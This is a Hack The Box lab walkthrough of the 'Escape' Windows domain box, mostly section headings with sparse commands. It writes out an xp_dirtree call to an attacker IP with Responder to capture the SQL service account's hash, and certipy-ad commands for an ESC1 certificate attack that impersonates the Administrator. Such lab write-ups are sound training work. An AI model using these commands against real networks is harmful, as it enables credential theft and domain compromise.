Escape HTB Walkthrough

Oct 5, 2024    #box   #htb   #medium   #windows   #ldap   #mssql   #mysql   #ca   #certificate   #esc1  

Escape Hack The Box Walkthrough/Writeup:

How I use variables & wordlists:

1. Enumeration:

NMAP:

LDAP 389:

DNS 53:

Using dnsenum to enumerate DNS records:

Kerberos 88:

Using Kerbrute to bruteforce Usernames:

SMB 445:

Using netexec to check for null & guest session on SMB:

Over view of IPC$ Share:

Connecting to the Public SMB Share using smbclient:

Attempting to extract creator names from the .PDF:

If you are not aware, it is sometimes possible to extract valid domain usernames from pdf's if they have been created on a Windows host. As often the Creator Field is populated using the Windows User’s Logged-In Name

Attempting to extract Usernames From the PDF using exiftool:

Finding Hard-Coded mSSQL Creds in the SQL Server Procedures PDF:

Finding Usernames within the PDF:

Cred Stuffing & Meaning of “Guest” in the SMB Responses in netexec:

MSSQL 1433:

Cred stuffing the MSSQL Instance:

2. Foothold:

Connecting to the MSSQL Instance using impacket-mssqlclient:

Enumerating the MSSQL Instance:

Capturing the MSSQL System Admin hash using Responder & xp_dirtree:

  1. I start Responder :

    • sudo responder -v -I tun0
  2. I use xp_dirtee to connect back to my malicious SMB server:

    • exec master..xp_dirtree '\\10.10.14.38\share\'
      • This is just \\<MYKALIIP\FAKESHARE>
  3. Hash Caught:

    • This works as when we run the command using xp_dirtree it tries to connect & authorize to our malicious SMB server & Responder captures the hash:

Overview of xp_dirtree:

Cracking the MSSQL System Admin using Hashcat :

Enumerating SMB as sql_svc user:

SYSVOL Share:

Running bloodhound.py:

Connecting to the MSSQL as sql_svc:

Finding a linked SQL Instance:

Enumerating the Host Using xp_dirtree:

Downloading ERRORLOG.BAK & why it’s important to re-check your tools:

Reading ERRORLOG.BAK & finding credentials for Ryan.Cooper:

3. Privilege Escalation:

Enumerating the host as Ryan.Cooper:

Automated Enumeration:

Stored Credentials Enumeration:

User Enumeration:

Basic System Enumeration:

Installed Program Enumeration:

Path Enumeration:

Drive Enumeration:

Scheduled Task Enumeration:

Powershell History Enumeration:

Network Enumeration:

Service/Process Enumeration:

Enumerating the password policy:

Enumerating if the DC is vulnerable to any certificate privilege escalation techniques.

Using ESC1 Attack Chain to elevate privileges to Administrator:

  1. I retrieve the certificate template name from the file:

  2. I sync my clock:

    • sudo ntpdate -s sequel.htb
      • +Note+:
        • If you see the below error this is most likely down to your attack host clock being too out of sync with the target. (Picture taken from a previous box where I learned the hard way)
  3. I request a cert:

    • certipy-ad req -username $user@$domain -password $pass -ca sequel-DC-CA -target ca.$domain -template UserAuthentication -upn administrator@$domain -dns dc.$domain
      • +Note+: How we have used the name of the certificate we found in step 1 UserAuthentication
      • +!!!SUCESS!!!+
  4. I request to authenticate as the Administrator and retrieve the Administrator NT hash & creds stored in .ccache:

    • certipy-ad auth -pfx administrator_dc.pfx -dc-ip $box
    • We have both the administrator hash as well as the creds stored in .ccache which we can use Kerberos authentication with.

Attack Deep-Dive e.g Exploiting UPN’s in ESC1 Attacks: A Hackers Guide:

4. Ownership:

Dumping NTDS.dit database:

Loading .ccache into the KRB5CCNAME Variable to Authenticate:

Lessons Learned:

What did I learn?

  1. I hadn’t actually used the ESC1 attack vector before only ESC7 in https://bloodstiller.com/walkthroughs/manager-box/ , so it was cool to that.
  2. I learned about netexec displaying guest when a random username and password is supplied as a way to show that guest logon is accepted on the target.
  3. I learned to always re-check my tools. That mistake with evil-winrm was silly.

What silly mistakes did I make?

  1. See point 3 above.
  2. Oh I also tried to use the wrong certificate name when initially doing the exploit, copy & paste always!

Sign off:

Remember, folks as always: with great power comes great pwnage. Use this knowledge wisely, and always stay on the right side of the law!

Until next time, hack the planet!

– Bloodstiller

– Get in touch bloodstiller at proton dot me



Next: Hospital HTB Walkthrough